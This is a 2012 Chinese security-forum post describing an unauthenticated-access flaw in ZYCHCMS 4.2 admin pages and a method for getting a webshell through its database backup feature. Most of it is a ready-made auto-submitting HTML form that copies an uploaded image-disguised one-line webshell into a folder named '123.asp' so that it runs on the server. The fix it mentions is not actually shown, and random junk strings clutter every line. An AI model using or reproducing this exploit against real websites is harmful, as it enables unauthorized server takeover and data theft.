找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1754|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
( `' c" |' O, P% @( H

& l3 l% D! \0 c8 l. i( y8 L% m2 ~, N4 {2 u5 L7 R2 t9 ^( T( X7 t

3 a, E, a& V1 t) l9 n' i影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)' p1 a4 R1 o/ r
①SQL注射漏洞9 [7 p1 ?2 H+ C$ X: J& i
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
+ i  O, i: a/ ?( i( ` 漏洞原因:未过滤
# U* t' o4 v+ s1 C" _- m- y  U 漏洞代码:0 Q4 \( j! v8 T6 H% O3 I
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
. R$ `# _- N4 `5 p  A9 ?: f 修复方法:在文件开头加入代码6 d: `* P: n& b: e8 [

9 o+ _& n1 D# v. d; E) m: D* O8 G
* I! p  }6 L4 B) z) V- G/ z②后台拿WBSHELL
2 E0 N6 z" B; l3 J" G 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。/ R! J* M1 X  }7 B0 e. }- o
这里在网上找了一个,改了下,将就着用。
1 P3 `! C- W. Z; n 以下是代码本地提交代码
# [9 P$ J6 N0 R# D5 o5 c
5 X; Q+ \' R& f7 C( U+ ?. E. k' ^+ o5 w6 B. {3 _
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
% T" m/ x: J$ f <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
1 t8 M9 U& f$ |2 n6 S4 ^ <tr>
, z- b) u  [4 h4 D( N' M <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>4 d: I9 i& u4 _4 i7 |
</tr>
& I) O# R6 k" i2 I$ M <tr>5 p( M+ M# ?% a7 {4 b2 c
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
9 I  U# D3 }! T: K </span>
( ^" U; j9 V, {8 C5 j+ k' T <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
4 N8 c" z0 e4 m; e2 B <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >' h' R# M" R3 r; z" {2 Z
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>4 l) f4 h+ m( ?
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
3 N( ?6 m% P$ p- N/ `% u <div align=”left”>5 G# n" ?1 K' F3 K( v8 M4 n  R( n: h
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />" V: }3 E( v, k* T4 a# \
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>0 h; R4 w7 u6 }% h7 Z
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
* J: q% v1 z/ y4 s </div></td>" P: y. C7 |5 ]1 @; v" @$ Z4 v
</tr>
0 ~5 N7 Z# m8 p2 v' a+ Y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
& T3 ^6 @9 W/ P! A, K <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>5 V' s& }# m5 }8 f2 i5 G& J) ]
<td class=”td”><div align=”left”>
$ i8 I6 k: O4 _# G4 R! ` <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
/ v: i( b% Q2 E* }& J [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>& Z" G( F5 K" ]$ w, e3 y2 O8 F
</tr>' j6 }: U9 T( t  |" N; y
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>$ A/ y3 N" z2 k6 ]) o6 n
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
5 s9 Z0 l1 G% ^' D) j. ~; b9 h; t <td class=”td”><div align=”left”>, F1 u( u5 r# ^8 a7 ?4 Q$ v# r
<input type=”submit” value=”确定备份” class=”btn”
/ R6 L# U: i9 |7 @! U5 m </div></td>
4 @, U  H6 l. m, Z) ?; d7 [4 N# l </tr>
+ N! \' v) [6 m: y  |  L: C </table></td></tr></form>, ]/ L1 H6 u. v; n% ^
</table>( \+ x& e. f* _& L/ @7 Q
</td>
$ P( t( p: C- [& n& ^ </tr>( T1 v& l: L" J6 e( J7 ~$ V
</table>
) |# ]3 t& i( k% q <script>
9 J4 g+ q9 x# A3 D) G) O) B8 A; a document.all.add.submit();- f# O6 j- U/ H. e- T
</script>- X, D8 G1 \; W3 ~9 V9 H0 E
/ z( f; C9 Z! O! [5 @8 ]/ O5 A
9 I' e+ ~/ Q: H# {+ R
- w7 l  f. v% O

8 c" Y. L3 Q/ l+ C9 Q( n! O
6 q$ i- Z) w. Z3 w& l% u
5 Z% k; H: d; q4 c% @, u& n# A6 r. o* b& E
/ m9 [# R% M% A# a. U& B7 a0 s

* i% I5 R: ~# ]# ^9 T) ]+ x3 |- t- X- O: g  Q# v7 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表